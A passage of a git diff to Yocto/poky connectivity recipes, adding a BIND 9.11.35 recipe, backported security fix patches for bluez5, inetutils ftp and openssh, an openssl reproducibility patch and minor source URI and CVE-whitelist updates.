= "--system --home ${localstatedir}/cache/bind --no-create-home \ - --user-group bind" - -INITSCRIPT_NAME = "bind" -INITSCRIPT_PARAMS = "defaults" - -SYSTEMD_SERVICE_${PN} = "named.service" - -do_install_prepend() { - # clean host path in isc-config.sh before the hardlink created - # by "make install": - # bind9-config -> isc-config.sh - sed -i -e "s,${STAGING_LIBDIR},${libdir}," ${B}/isc-config.sh -} - -do_install_append() { - - rmdir "${D}${localstatedir}/run" - rmdir --ignore-fail-on-non-empty "${D}${localstatedir}" - install -d -o bind "${D}${localstatedir}/cache/bind" - install -d "${D}${sysconfdir}/bind" - install -d "${D}${sysconfdir}/init.d" - install -m 644 ${S}/conf/* "${D}${sysconfdir}/bind/" - install -m 755 "${S}/init.d" "${D}${sysconfdir}/init.d/bind" - if ${@bb.utils.contains('PACKAGECONFIG', 'python3', 'true', 'false', d)}; then - sed -i -e '1s,#!.*python3,#! /usr/bin/python3,' \ - ${D}${sbindir}/dnssec-coverage \ - ${D}${sbindir}/dnssec-checkds \ - ${D}${sbindir}/dnssec-keymgr - fi - - # Install systemd related files - install -d ${D}${sbindir} - install -m 755 ${WORKDIR}/generate-rndc-key.sh ${D}${sbindir} - install -d ${D}${systemd_unitdir}/system - install -m 0644 ${WORKDIR}/named.service ${D}${systemd_unitdir}/system - sed -i -e 's,@BASE_BINDIR@,${base_bindir},g' \ - -e 's,@SBINDIR@,${sbindir},g' \ - ${D}${systemd_unitdir}/system/named.service - - install -d ${D}${sysconfdir}/default - install -m 0644 ${WORKDIR}/bind9 ${D}${sysconfdir}/default - - if ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'true', 'false', d)}; then - install -d ${D}${sysconfdir}/tmpfiles.d - echo "d /run/named 0755 bind bind - -" > ${D}${sysconfdir}/tmpfiles.d/bind.conf - fi - - oe_multilib_header isc/platform.h -} - -CONFFILES_${PN} = " \ - ${sysconfdir}/bind/named.conf \ - ${sysconfdir}/bind/named.conf.local \ - ${sysconfdir}/bind/named.conf.options \ - ${sysconfdir}/bind/db.0 \ - ${sysconfdir}/bind/db.127 \ - ${sysconfdir}/bind/db.empty \ - ${sysconfdir}/bind/db.local \ - ${sysconfdir}/bind/db.root \ - " - -ALTERNATIVE_${PN}-utils = "nslookup" -ALTERNATIVE_LINK_NAME[nslookup] = "${bindir}/nslookup" -ALTERNATIVE_PRIORITY = "100" - -PACKAGE_BEFORE_PN += "${PN}-utils" -FILES_${PN}-utils = "${bindir}/host ${bindir}/dig ${bindir}/mdig ${bindir}/nslookup ${bindir}/nsupdate" -FILES_${PN}-dev += "${bindir}/isc-config.h" -FILES_${PN} += "${sbindir}/generate-rndc-key.sh" - -PACKAGE_BEFORE_PN += "${PN}-libs" -FILES_${PN}-libs = "${libdir}/*.so*" -FILES_${PN}-staticdev += "${libdir}/*.la" - -PACKAGE_BEFORE_PN += "${@bb.utils.contains('PACKAGECONFIG', 'python3', 'python3-bind', '', d)}" -FILES_python3-bind = "${sbindir}/dnssec-coverage ${sbindir}/dnssec-checkds \ - ${sbindir}/dnssec-keymgr ${PYTHON_SITEPACKAGES_DIR}" - -RDEPENDS_${PN}-dev = "" -RDEPENDS_python3-bind = "python3-core python3-ply" diff --git a/poky/meta/recipes-connectivity/bind/bind_9.11.35.bb b/poky/meta/recipes-connectivity/bind/bind_9.11.35.bb new file mode 100644 index 0000000000..4652529623 --- /dev/null +++ b/poky/meta/recipes-connectivity/bind/bind_9.11.35.bb @@ -0,0 +1,141 @@ +SUMMARY = "ISC Internet Domain Name Server" +HOMEPAGE = "https://www.isc.org/bind/" +DESCRIPTION = "BIND 9 provides a full-featured Domain Name Server system" +SECTION = "console/network" + +LICENSE = "ISC & BSD" +LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=b88e7ca5f21908e1b2720169f6807cf6" + +DEPENDS = "openssl libcap zlib" + +SRC_URI = "https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.gz \ + file://conf.patch \ + file://named.service \ + file://bind9 \ + file://generate-rndc-key.sh \ + file://make-etc-initd-bind-stop-work.patch \ + file://init.d-add-support-for-read-only-rootfs.patch \ + file://bind-ensure-searching-for-json-headers-searches-sysr.patch \ + file://0001-configure.in-remove-useless-L-use_openssl-lib.patch \ + file://0001-named-lwresd-V-and-start-log-hide-build-options.patch \ + file://0001-avoid-start-failure-with-bind-user.patch \ + " + +SRC_URI[sha256sum] = "1c882705827b6aafa45d917ae3b20eccccc8d5df3c4477df44b04382e6c47562" + +UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/" +# stay at 9.11 until 9.16, from 9.16 follow the ESV versions divisible by 4 +UPSTREAM_CHECK_REGEX = "(?P9.(11|16|20|24|28)(\.\d+)+(-P\d+)*)/" + +# BIND >= 9.11.2 need dhcpd >= 4.4.0, +# don't report it here since dhcpd is already recent enough. +CVE_CHECK_WHITELIST += "CVE-2019-6470" + +inherit autotools update-rc.d systemd useradd pkgconfig multilib_script multilib_header + +MULTILIB_SCRIPTS = "${PN}:${bindir}/bind9-config ${PN}:${bindir}/isc-config.sh" + +# PACKAGECONFIGs readline and libedit should NOT be set at same time +PACKAGECONFIG ?= "readline" +PACKAGECONFIG[httpstats] = "--with-libxml2=${STAGING_DIR_HOST}${prefix},--without-libxml2,libxml2" +PACKAGECONFIG[readline] = "--with-readline=-lreadline,,readline" +PACKAGECONFIG[libedit] = "--with-readline=-ledit,,libedit" +PACKAGECONFIG[urandom] = "--with-randomdev=/dev/urandom,--with-randomdev=/dev/random,," +PACKAGECONFIG[python3] = "--with-python=yes --with-python-install-dir=${PYTHON_SITEPACKAGES_DIR} , --without-python, python3-ply-native," + +ENABLE_IPV6 = "--enable-ipv6=${@bb.utils.contains('DISTRO_FEATURES', 'ipv6', 'yes', 'no', d)}" +EXTRA_OECONF = " ${ENABLE_IPV6} --with-libtool --enable-threads \ + --disable-devpoll --enable-epoll --with-gost=no \ + --with-gssapi=no --with-ecdsa=yes --with-eddsa=no \ + --with-lmdb=no \ + --sysconfdir=${sysconfdir}/bind \ + --with-openssl=${STAGING_DIR_HOST}${prefix} \ + " + +inherit ${@bb.utils.contains('PACKAGECONFIG', 'python3', 'python3native distutils3-base', '', d)} + +# dhcp needs .la so keep them +REMOVE_LIBTOOL_LA = "0" + +USERADD_PACKAGES = "${PN}" +USERADD_PARAM_${PN} = "--system --home ${localstatedir}/cache/bind --no-create-home \ + --user-group bind" + +INITSCRIPT_NAME = "bind" +INITSCRIPT_PARAMS = "defaults" + +SYSTEMD_SERVICE_${PN} = "named.service" + +do_install_prepend() { + # clean host path in isc-config.sh before the hardlink created + # by "make install": + # bind9-config -> isc-config.sh + sed -i -e "s,${STAGING_LIBDIR},${libdir}," ${B}/isc-config.sh +} + +do_install_append() { + + rmdir "${D}${localstatedir}/run" + rmdir --ignore-fail-on-non-empty "${D}${localstatedir}" + install -d -o bind "${D}${localstatedir}/cache/bind" + install -d "${D}${sysconfdir}/bind" + install -d "${D}${sysconfdir}/init.d" + install -m 644 ${S}/conf/* "${D}${sysconfdir}/bind/" + install -m 755 "${S}/init.d" "${D}${sysconfdir}/init.d/bind" + if ${@bb.utils.contains('PACKAGECONFIG', 'python3', 'true', 'false', d)}; then + sed -i -e '1s,#!.*python3,#! /usr/bin/python3,' \ + ${D}${sbindir}/dnssec-coverage \ + ${D}${sbindir}/dnssec-checkds \ + ${D}${sbindir}/dnssec-keymgr + fi + + # Install systemd related files + install -d ${D}${sbindir} + install -m 755 ${WORKDIR}/generate-rndc-key.sh ${D}${sbindir} + install -d ${D}${systemd_unitdir}/system + install -m 0644 ${WORKDIR}/named.service ${D}${systemd_unitdir}/system + sed -i -e 's,@BASE_BINDIR@,${base_bindir},g' \ + -e 's,@SBINDIR@,${sbindir},g' \ + ${D}${systemd_unitdir}/system/named.service + + install -d ${D}${sysconfdir}/default + install -m 0644 ${WORKDIR}/bind9 ${D}${sysconfdir}/default + + if ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'true', 'false', d)}; then + install -d ${D}${sysconfdir}/tmpfiles.d + echo "d /run/named 0755 bind bind - -" > ${D}${sysconfdir}/tmpfiles.d/bind.conf + fi + + oe_multilib_header isc/platform.h +} + +CONFFILES_${PN} = " \ + ${sysconfdir}/bind/named.conf \ + ${sysconfdir}/bind/named.conf.local \ + ${sysconfdir}/bind/named.conf.options \ + ${sysconfdir}/bind/db.0 \ + ${sysconfdir}/bind/db.127 \ + ${sysconfdir}/bind/db.empty \ + ${sysconfdir}/bind/db.local \ + ${sysconfdir}/bind/db.root \ + " + +ALTERNATIVE_${PN}-utils = "nslookup" +ALTERNATIVE_LINK_NAME[nslookup] = "${bindir}/nslookup" +ALTERNATIVE_PRIORITY = "100" + +PACKAGE_BEFORE_PN += "${PN}-utils" +FILES_${PN}-utils = "${bindir}/host ${bindir}/dig ${bindir}/mdig ${bindir}/nslookup ${bindir}/nsupdate" +FILES_${PN}-dev += "${bindir}/isc-config.h" +FILES_${PN} += "${sbindir}/generate-rndc-key.sh" + +PACKAGE_BEFORE_PN += "${PN}-libs" +FILES_${PN}-libs = "${libdir}/*.so*" +FILES_${PN}-staticdev += "${libdir}/*.la" + +PACKAGE_BEFORE_PN += "${@bb.utils.contains('PACKAGECONFIG', 'python3', 'python3-bind', '', d)}" +FILES_python3-bind = "${sbindir}/dnssec-coverage ${sbindir}/dnssec-checkds \ + ${sbindir}/dnssec-keymgr ${PYTHON_SITEPACKAGES_DIR}" + +RDEPENDS_${PN}-dev = "" +RDEPENDS_python3-bind = "python3-core python3-ply" diff --git a/poky/meta/recipes-connectivity/bluez5/bluez5.inc b/poky/meta/recipes-connectivity/bluez5/bluez5.inc index 202a14dee0..34796fdd20 100644 --- a/poky/meta/recipes-connectivity/bluez5/bluez5.inc +++ b/poky/meta/recipes-connectivity/bluez5/bluez5.inc @@ -52,6 +52,7 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \ ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '', 'file://0001-Allow-using-obexd-without-systemd-in-the-user-sessio.patch', d)} \ file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \ file://0001-test-gatt-Fix-hung-issue.patch \ + file://CVE-2021-0129.patch \ file://CVE-2021-3588.patch \ " S = "${WORKDIR}/bluez-${PV}" diff --git a/poky/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch b/poky/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch new file mode 100644 index 0000000000..b39730dc10 --- /dev/null +++ b/poky/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch @@ -0,0 +1,109 @@ +From 00da0fb4972cf59e1c075f313da81ea549cb8738 Mon Sep 17 00:00:00 2001 +From: Luiz Augusto von Dentz +Date: Tue, 2 Mar 2021 11:38:33 -0800 +Subject: shared/gatt-server: Fix not properly checking for secure flags + +When passing the mask to check_permissions all valid permissions for +the operation must be set including BT_ATT_PERM_SECURE flags. + +Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/patch/?id=00da0fb4972cf59e1c075f313da81ea549cb8738] +Signed-off-by: Marta Rybczynska +CVE: CVE-2021-0129 +--- + src/shared/att-types.h | 8 ++++++++ + src/shared/gatt-server.c | 25 +++++++------------------ + 2 files changed, 15 insertions(+), 18 deletions(-) + +diff --git a/src/shared/att-types.h b/src/shared/att-types.h +index 7108b4e94..3adc05d9e 100644 +--- a/src/shared/att-types.h ++++ b/src/shared/att-types.h +@@ -129,6 +129,14 @@ struct bt_att_pdu_error_rsp { + #define BT_ATT_PERM_WRITE_SECURE 0x0200 + #define BT_ATT_PERM_SECURE (BT_ATT_PERM_READ_SECURE | \ + BT_ATT_PERM_WRITE_SECURE) ++#define BT_ATT_PERM_READ_MASK (BT_ATT_PERM_READ | \ ++ BT_ATT_PERM_READ_AUTHEN | \ ++ BT_ATT_PERM_READ_ENCRYPT | \ ++ BT_ATT_PERM_READ_SECURE) ++#define BT_ATT_PERM_WRITE_MASK (BT_ATT_PERM_WRITE | \ ++ BT_ATT_PERM_WRITE_AUTHEN | \ ++ BT_ATT_PERM_WRITE_ENCRYPT | \ ++ BT_ATT_PERM_WRITE_SECURE) + + /* GATT Characteristic Properties Bitfield values */ + #define BT_GATT_CHRC_PROP_BROADCAST 0x01 +diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c +index b5f7de7dc..970c35f94 100644 +--- a/src/shared/gatt-server.c ++++ b/src/shared/gatt-server.c +@@ -444,9 +444,7 @@ static void process_read_by_type(struct async_read_op *op) + return; + } + +- ecode = check_permissions(server, attr, BT_ATT_PERM_READ | +- BT_ATT_PERM_READ_AUTHEN | +- BT_ATT_PERM_READ_ENCRYPT); ++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK); + if (ecode) + goto error; + +@@ -811,9 +809,7 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu, + (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd", + handle); + +- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE | +- BT_ATT_PERM_WRITE_AUTHEN | +- BT_ATT_PERM_WRITE_ENCRYPT); ++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK); + if (ecode) + goto error; + +@@ -913,9 +909,7 @@ static void handle_read_req(struct bt_att_chan *chan, + opcode == BT_ATT_OP_READ_BLOB_REQ ? "Blob " : "", + handle); + +- ecode = check_permissions(server, attr, BT_ATT_PERM_READ | +- BT_ATT_PERM_READ_AUTHEN | +- BT_ATT_PERM_READ_ENCRYPT); ++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK); + if (ecode) + goto error; + +@@ -1051,9 +1045,8 @@ static void read_multiple_complete_cb(struct gatt_db_attribute *attr, int err, + goto error; + } + +- ecode = check_permissions(data->server, next_attr, BT_ATT_PERM_READ | +- BT_ATT_PERM_READ_AUTHEN | +- BT_ATT_PERM_READ_ENCRYPT); ++ ecode = check_permissions(data->server, next_attr, ++ BT_ATT_PERM_READ_MASK); + if (ecode) + goto error; + +@@ -1129,9 +1122,7 @@ static void read_multiple_cb(struct bt_att_chan *chan, uint8_t opcode, + goto error; + } + +- ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ | +- BT_ATT_PERM_READ_AUTHEN | +- BT_ATT_PERM_READ_ENCRYPT); ++ ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ_MASK); + if (ecode) + goto error; + +@@ -1308,9 +1299,7 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode, + util_debug(server->debug_callback, server->debug_data, + "Prep Write Req - handle: 0x%04x", handle); + +- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE | +- BT_ATT_PERM_WRITE_AUTHEN | +- BT_ATT_PERM_WRITE_ENCRYPT); ++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK); + if (ecode) + goto error; + +-- +cgit 1.2.3-1.el7 + diff --git a/poky/meta/recipes-connectivity/connman/connman-gnome_0.7.bb b/poky/meta/recipes-connectivity/connman/connman-gnome_0.7.bb index 778bf50191..24593d6258 100644 --- a/poky/meta/recipes-connectivity/connman/connman-gnome_0.7.bb +++ b/poky/meta/recipes-connectivity/connman/connman-gnome_0.7.bb @@ -10,7 +10,7 @@ DEPENDS = "gtk+3 dbus-glib dbus-glib-native intltool-native gettext-native" # 0.7 tag SRCREV = "cf3c325b23dae843c5499a113591cfbc98acb143" -SRC_URI = "git://github.com/connectivity/connman-gnome.git \ +SRC_URI = "git://github.com/connectivity/connman-gnome.git;branch=master;protocol=https \ file://0001-Removed-icon-from-connman-gnome-about-applet.patch \ file://null_check_for_ipv4_config.patch \ file://images/* \ diff --git a/poky/meta/recipes-connectivity/connman/connman.inc b/poky/meta/recipes-connectivity/connman/connman.inc index 55e5bf97c7..c495ae29ad 100644 --- a/poky/meta/recipes-connectivity/connman/connman.inc +++ b/poky/meta/recipes-connectivity/connman/connman.inc @@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \ inherit autotools pkgconfig systemd update-rc.d update-alternatives +CVE_PRODUCT = "connman connection_manager" + DEPENDS = "dbus glib-2.0 ppp" INC_PR = "r20" diff --git a/poky/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch b/poky/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch new file mode 100644 index 0000000000..54252d6bc7 --- /dev/null +++ b/poky/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch @@ -0,0 +1,67 @@ +From 4e355804d57d5686defc363c70f81e6f58cd08f0 Mon Sep 17 00:00:00 2001 +From: Simon Josefsson +Date: Fri, 17 Dec 2021 21:52:18 -0800 +Subject: [PATCH] ftp: check that PASV/LSPV addresses match. + +* NEWS: Mention change. +* ftp/ftp.c (initconn): Validate returned addresses. + +CVE: CVE-2021-40491 + +Upstream-Status: Backport +[https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=58cb043b190fd04effdaea7c9403416b436e50dd] + +Signed-off-by: Minjae Kim +--- + ftp/ftp.c | 21 +++++++++++++++++++++ + 1 file changed, 21 insertions(+) + +diff --git a/ftp/ftp.c b/ftp/ftp.c +index 9813586..7c72cb2 100644 +--- a/ftp/ftp.c ++++ b/ftp/ftp.c +@@ -1344,6 +1344,13 @@ initconn (void) + uint32_t *pu32 = (uint32_t *) &data_addr_sa4->sin_addr.s_addr; + pu32[0] = htonl ( (h[0] << 24) | (h[1] << 16) | (h[2] << 8) | h[3]); + } ++ if (data_addr_sa4->sin_addr.s_addr ++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr) ++ { ++ printf ("Passive mode address mismatch.\n"); ++ (void) command ("ABOR"); /* Cancel any open connection. */ ++ goto bad; ++ } + } /* LPSV IPv4 */ + else /* IPv6 */ + { +@@ -1374,6 +1381,13 @@ initconn (void) + pu32[2] = htonl ( (h[8] << 24) | (h[9] << 16) | (h[10] << 8) | h[11]); + pu32[3] = htonl ( (h[12] << 24) | (h[13] << 16) | (h[14] << 8) | h[15]); + } ++ if (data_addr_sa6->sin6_addr.s6_addr ++ != ((struct sockaddr_in6 *) &hisctladdr)->sin6_addr.s6_addr) ++ { ++ printf ("Passive mode address mismatch.\n"); ++ (void) command ("ABOR"); /* Cancel any open connection. */ ++ goto bad; ++ } + } /* LPSV IPv6 */ + } + else /* !EPSV && !LPSV */ +@@ -1394,6 +1408,13 @@ initconn (void) + | ((a2 & 0xff) << 8) | (a3 & 0xff) ); + data_addr_sa4->sin_port = + htons (((p0 & 0xff) << 8) | (p1 & 0xff)); ++ if (data_addr_sa4->sin_addr.s_addr ++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr) ++ { ++ printf ("Passive mode address mismatch.\n"); ++ (void) command ("ABOR"); /* Cancel any open connection. */ ++ goto bad; ++ } + } /* PASV */ + else + { +-- +2.25.1 + diff --git a/poky/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb b/poky/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb index cc9410b94e..f4450e19f4 100644 --- a/poky/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb +++ b/poky/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb @@ -23,6 +23,7 @@ SRC_URI = "${GNU_MIRROR}/inetutils/inetutils-${PV}.tar.gz \ file://inetutils-only-check-pam_appl.h-when-pam-enabled.patch \ file://0001-rcp-fix-to-work-with-large-files.patch \ file://fix-buffer-fortify-tfpt.patch \ + file://CVE-2021-40491.patch \ " SRC_URI[md5sum] = "04852c26c47cc8c6b825f2b74f191f52" diff --git a/poky/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb b/poky/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb index 9a83898e52..5213b28345 100644 --- a/poky/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb +++ b/poky/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1" DEPENDS = "avahi" -SRC_URI = "git://github.com/lathiat/nss-mdns \ +SRC_URI = "git://github.com/lathiat/nss-mdns;branch=master;protocol=https \ " SRCREV = "41c9c5e78f287ed4b41ac438c1873fa71bfa70ae" diff --git a/poky/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb b/poky/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb index f170cf4650..b4cbc1a76c 100644 --- a/poky/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb +++ b/poky/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb @@ -8,7 +8,7 @@ SRCREV = "90f3fe28aa25135b7e4a54a7816388913bfd4a2a" PV = "20201225" PE = "1" -SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https" +SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https;branch=master" S = "${WORKDIR}/git" inherit autotools diff --git a/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch b/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch new file mode 100644 index 0000000000..9fd7e932d1 --- /dev/null +++ b/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch @@ -0,0 +1,20 @@ +Description: fix double-free memory corruption in ssh-agent +Author: Marc Deslauriers +Origin: minimal fix for https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db + +Signed-off-by: Sana Kazi + +CVE: CVE-2021-28041 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_8.2p1-4ubuntu0.3.debian.tar.xz] +Comment: No change in any hunk + +--- a/ssh-agent.c ++++ b/ssh-agent.c +@@ -496,6 +496,7 @@ process_add_identity(SocketEntry *e) + goto err; + } + free(ext_name); ++ ext_name = NULL; + break; + default: + error("%s: Unknown constraint %d", __func__, ctype); diff --git a/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch b/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch new file mode 100644 index 0000000000..bda896f581 --- /dev/null +++ b/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch @@ -0,0 +1,52 @@ +From a6414400ec94a17871081f7df24f910a6ee01b8b Mon Sep 17 00:00:00 2001 +From: Ali Abdallah +Date: Wed, 24 Nov 2021 13:33:39 +0100 +Subject: [PATCH] CVE-2021-41617 fix + +backport of the following two upstream commits + +f3cbe43e28fe71427d41cfe3a17125b972710455 +bf944e3794eff5413f2df1ef37cddf96918c6bde + +CVE-2021-41617 failed to correctly initialise supplemental groups +when executing an AuthorizedKeysCommand or AuthorizedPrincipalsCommand, +where a AuthorizedKeysCommandUser or AuthorizedPrincipalsCommandUser +directive has been set to run the command as a different user. Instead +these commands would inherit the groups that sshd(8) was started with. +--- + auth.c | 8 ++++++++ + 1 file changed, 8 insertions(+) + +CVE: CVE-2021-41617 +Upstream-Status: Backport [https://bugzilla.suse.com/attachment.cgi?id=854015] +Comment: No change in any hunk +Signed-off-by: Sana Kazi + +diff --git a/auth.c b/auth.c +index 163038f..a47b267 100644 +--- a/auth.c ++++ b/auth.c +@@ -52,6 +52,7 @@ + #include + #include + #include ++#include + + #include "xmalloc.h" + #include "match.h" +@@ -851,6 +852,13 @@ subprocess(const char *tag, struct passwd *pw, const char *command, + } + closefrom(STDERR_FILENO + 1); + ++ if (geteuid() == 0 && ++ initgroups(pw->pw_name, pw->pw_gid) == -1) { ++ error("%s: initgroups(%s, %u): %s", tag, ++ pw->pw_name, (u_int)pw->pw_gid, strerror(errno)); ++ _exit(1); ++ } ++ + /* Don't use permanently_set_uid() here to avoid fatal() */ + if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) == -1) { + error("%s: setresgid %u: %s", tag, (u_int)pw->pw_gid, +-- +2.26.2 diff --git a/poky/meta/recipes-connectivity/openssh/openssh_8.2p1.bb b/poky/meta/recipes-connectivity/openssh/openssh_8.2p1.bb index 64a0a72a8f..ddc9ed0b32 100644 --- a/poky/meta/recipes-connectivity/openssh/openssh_8.2p1.bb +++ b/poky/meta/recipes-connectivity/openssh/openssh_8.2p1.bb @@ -5,7 +5,7 @@ Ssh (Secure Shell) is a program for logging into a remote machine \ and for executing commands on a remote machine." HOMEPAGE = "http://www.openssh.com/" SECTION = "console/network" -LICENSE = "BSD & ISC & MIT" +LICENSE = "BSD-2-Clause & BSD-3-Clause & BSD-4-Clause & ISC & MIT" LIC_FILES_CHKSUM = "file://LICENCE;md5=18d9e5a8b3dd1790d73502f50426d4d3" DEPENDS = "zlib openssl virtual/crypt" @@ -25,6 +25,8 @@ SRC_URI = "http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-${PV}.tar file://sshd_check_keys \ file://add-test-support-for-busybox.patch \ file://CVE-2020-14145.patch \ + file://CVE-2021-28041.patch \ + file://CVE-2021-41617.patch \ " SRC_URI[md5sum] = "3076e6413e8dbe56d33848c1054ac091" SRC_URI[sha256sum] = "43925151e6cf6cee1450190c0e9af4dc36b41c12737619edff8bcebdff64e671" @@ -49,6 +51,15 @@ CVE_CHECK_WHITELIST += "CVE-2020-15778" # https://www.securityfocus.com/bid/30794 CVE_CHECK_WHITELIST += "CVE-2008-3844" +# openssh-ssh1 is provided for compatibility with old devices that +# cannot be upgraded to modern protocols. Thus they may not provide security +# support for this package because doing so would prevent access to equipment. +# The upstream OpenSSH developers see this as an important +# security feature and do not intend to 'fix' it. +# https://security-tracker.debian.org/tracker/CVE-2016-20012 +# https://ubuntu.com/security/CVE-2016-20012 +CVE_CHECK_WHITELIST += "CVE-2016-20012" + PAM_SRC_URI = "file://sshd" inherit manpages useradd update-rc.d update-alternatives systemd diff --git a/poky/meta/recipes-connectivity/openssl/openssl/reproducibility.patch b/poky/meta/recipes-connectivity/openssl/openssl/reproducibility.patch new file mode 100644 index 0000000000..8accbc9df2 --- /dev/null +++ b/poky/meta/recipes-connectivity/openssl/openssl/reproducibility.patch @@ -0,0 +1,22 @@ +Using localtime() means the output can depend on the timezone of the build machine. +Using gmtime() is safer. For complete reproducibility use SOURCE_DATE_EPOCH if set. + +Signed-off-by: Richard Purdie +Upstream-Status: Pending [should be suitable] + +Index: openssl-3.0.1/apps/progs.pl +=================================================================== +--- openssl-3.0.1.orig/apps/progs.pl ++++ openssl-3.0.1/apps/progs.pl +@@ -21,7 +21,10 @@ die "Unrecognised option, must be -C or + my %commands = (); + my $cmdre = qr/^\s*int\s+([a-z_][a-z0-9_]*)_main\(\s*int\s+argc\s*,/; + my $apps_openssl = shift @ARGV; +-my $YEAR = [localtime()]->[5] + 1900; ++my $YEAR = [gmtime()]->[5] + 1900; ++if (defined($ENV{SOURCE_DATE_EPOCH}) && $ENV{SOURCE_DATE_EPOCH} !~ /\D/) { ++ $YEAR = [gmtime($ENV{SOURCE_DATE_EPOCH})]->[5] + 1900; ++} + + # because the program apps/openssl has object files as sources, and + # they then have the corresponding C files as source, we need to chain diff --git a/poky/meta/recipes-connectivity/openssl/openssl_1.1.1k.bb b/poky/meta/recipes-connectivity/openssl/openssl_1.1.1k.bb deleted file mode 100644 index 5f281197c9..0000000000 --- a/poky/meta/recipes-connectivity/openssl/openssl_1.1.1k.bb +++ /dev/null @@ -1,217 +0,0 @@ -SUMMARY = "Secure Socket Layer" -DESCRIPTION = "Secure Socket Layer (SSL) binary and related cryptographic tools." -HOMEPAGE = "http://www.openssl.org/" -BUGTRACKER = "http://www.openssl.org/news/vulnerabilities.html" -SECTION = "libs/network" - -# "openssl" here actually means both OpenSSL and SSLeay licenses apply -# (see meta/files/common-licenses/OpenSSL to which "openssl" is SPDXLICENSEMAPped) -LICENSE = "openssl" -LIC_FILES_CHKSUM = "file://LICENSE;md5=d343e62fc9c833710bbbed25f27364c8" - -DEPENDS = "hostperl-runtime-native" - -SRC_URI = "http://www.openssl.org/source/openssl-${PV}.tar.gz \ - file://run-ptest \ - file://0001-skip-test_symbol_presence.patch \ - file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \ - file://afalg.patch \ - file://reproducible.patch \ - " - -SRC_URI_append_class-nativesdk = " \ - file://environment.d-openssl.sh \ - " - -SRC_URI[sha256sum] = "892a0875b9872acd04a9fde79b1f943075d5ea162415de3047c327df33fbaee5" - -inherit lib_package multilib_header multilib_script ptest -MULTILIB_SCRIPTS = "${PN}-bin:${bindir}/c_rehash" - -PACKAGECONFIG ?= "" -PACKAGECONFIG_class-native = "" -PACKAGECONFIG_class-nativesdk = "" - -PACKAGECONFIG[cryptodev-linux] = "enable-devcryptoeng,disable-devcryptoeng,cryptodev-linux,,cryptodev-module" - -B = "${WORKDIR}/build" -do_configure[cleandirs] = "${B}" - -#| ./libcrypto.so: undefined reference to `getcontext' -#| ./libcrypto.so: undefined reference to `setcontext' -#| ./libcrypto.so: undefined reference to `makecontext' -EXTRA_OECONF_append_libc-musl = " no-async" -EXTRA_OECONF_append_libc-musl_powerpc64 = " no-asm" - -# adding devrandom prevents openssl from using getrandom() which is not available on older glibc versions -# (native versions can be built with newer glibc, but then relocated onto a system with older glibc) -EXTRA_OECONF_class-native = "--with-rand-seed=os,devrandom" -EXTRA_OECONF_class-nativesdk = "--with-rand-seed=os,devrandom" - -# Relying on hardcoded built-in paths causes openssl-native to not be relocateable from sstate. -CFLAGS_append_class-native = " 